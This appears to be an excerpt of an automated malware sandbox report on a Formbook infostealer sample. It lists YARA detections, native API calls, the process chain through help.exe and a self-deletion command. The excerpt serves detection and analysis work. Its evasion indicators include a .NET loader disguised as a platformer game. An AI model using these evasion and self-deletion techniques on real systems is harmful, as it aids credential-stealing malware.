          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_001453750_2_00145375
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_00B6E6A00_2_00B6E6A0
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_00B6E6900_2_00B6E690
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_00B6CC5C0_2_00B6CC5C
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_05776C480_2_05776C48
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_057709A60_2_057709A6
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_057709A80_2_057709A8
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_001420500_2_00142050
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 3_2_002253753_2_00225375
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 3_2_002220503_2_00222050
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041D1F54_2_0041D1F5
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041E1A14_2_0041E1A1
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_004012084_2_00401208
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041D3E74_2_0041D3E7
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041DE664_2_0041DE66
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041D6144_2_0041D614
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00409E304_2_00409E30
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041D78D4_2_0041D78D
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00B453754_2_00B45375
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00B420504_2_00B42050
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC22AE11_2_02BC22AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2EBB011_2_02B2EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB03DA11_2_02BB03DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBDBD211_2_02BBDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC2B2811_2_02BC2B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A011_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC20A811_2_02BC20A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0B09011_2_02B0B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC28EC11_2_02BC28EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BCE82411_2_02BCE824
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB100211_2_02BB1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1412011_2_02B14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFF90011_2_02AFF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC2EF711_2_02BC2EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B16E3011_2_02B16E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBD61611_2_02BBD616
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC1FF111_2_02BC1FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BCDFCE11_2_02BCDFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0841F11_2_02B0841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBD46611_2_02BBD466
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2258111_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0D5E011_2_02B0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC25DD11_2_02BC25DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF0D2011_2_02AF0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC2D0711_2_02BC2D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC1D5511_2_02BC1D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049E1A111_2_0049E1A1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049D5FD11_2_0049D5FD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00482D8911_2_00482D89
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00482D9011_2_00482D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00489E3011_2_00489E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00482FB011_2_00482FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02AFB150 appears 45 times
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419D50 NtCreateFile,4_2_00419D50
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419E00 NtReadFile,4_2_00419E00
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419E80 NtClose,4_2_00419E80
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419F30 NtAllocateVirtualMemory,4_2_00419F30
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419D4B NtCreateFile,4_2_00419D4B
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419E7A NtClose,4_2_00419E7A
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419F2D NtAllocateVirtualMemory,4_2_00419F2D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A50 NtCreateFile,LdrInitializeThunk,11_2_02B39A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39860 NtQuerySystemInformation,LdrInitializeThunk,11_2_02B39860
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39840 NtDelayExecution,LdrInitializeThunk,11_2_02B39840
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B399A0 NtCreateSection,LdrInitializeThunk,11_2_02B399A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_02B39910
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B396E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_02B396E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B396D0 NtCreateKey,LdrInitializeThunk,11_2_02B396D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_02B39660
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39650 NtQueryValueKey,LdrInitializeThunk,11_2_02B39650
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39780 NtMapViewOfSection,LdrInitializeThunk,11_2_02B39780
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39FE0 NtCreateMutant,LdrInitializeThunk,11_2_02B39FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39710 NtQueryInformationToken,LdrInitializeThunk,11_2_02B39710
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B395D0 NtClose,LdrInitializeThunk,11_2_02B395D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39540 NtReadFile,LdrInitializeThunk,11_2_02B39540
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A80 NtOpenDirectoryObject,11_2_02B39A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A20 NtResumeThread,11_2_02B39A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A10 NtQuerySection,11_2_02B39A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A00 NtProtectVirtualMemory,11_2_02B39A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3A3B0 NtGetContextThread,11_2_02B3A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39B00 NtSetValueKey,11_2_02B39B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B398A0 NtWriteVirtualMemory,11_2_02B398A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B398F0 NtReadVirtualMemory,11_2_02B398F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39820 NtEnumerateKey,11_2_02B39820
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3B040 NtSuspendThread,11_2_02B3B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B399D0 NtCreateProcessEx,11_2_02B399D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39950 NtQueueApcThread,11_2_02B39950
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39610 NtEnumerateValueKey,11_2_02B39610
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39670 NtQueryInformationProcess,11_2_02B39670
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B397A0 NtUnmapViewOfSection,11_2_02B397A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39730 NtQueryVirtualMemory,11_2_02B39730
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3A710 NtOpenProcessToken,11_2_02B3A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3A770 NtOpenThread,11_2_02B3A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39770 NtSetInformationFile,11_2_02B39770
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39760 NtOpenProcess,11_2_02B39760
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B395F0 NtQueryInformationFile,11_2_02B395F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3AD30 NtSetContextThread,11_2_02B3AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39520 NtWaitForSingleObject,11_2_02B39520
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39560 NtWriteFile,11_2_02B39560
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499D50 NtCreateFile,11_2_00499D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499E00 NtReadFile,11_2_00499E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499E80 NtClose,11_2_00499E80
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499F30 NtAllocateVirtualMemory,11_2_00499F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499D4B NtCreateFile,11_2_00499D4B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499E7A NtClose,11_2_00499E7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499F2D NtAllocateVirtualMemory,11_2_00499F2D
          Source: VJaX7U6LAp.exe, 00000000.00000002.361346330.00000000001C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000000.00000002.361662121.000000000086A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000003.00000000.356091448.00000000002A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000004.00000000.359914175.0000000000BC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000004.00000002.428794931.0000000001914000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exeBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exeVirustotal: Detection: 10%
          Source: VJaX7U6LAp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exe
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exeJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VJaX7U6LAp.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@4/0
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: VJaX7U6LAp.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: VJaX7U6LAp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: VJaX7U6LAp.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe
          Source: Binary string: help.pdbGCTL source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: VJaX7U6LAp.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.VJaX7U6LAp.exe.140000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.VJaX7U6LAp.exe.140000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.VJaX7U6LAp.exe.220000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
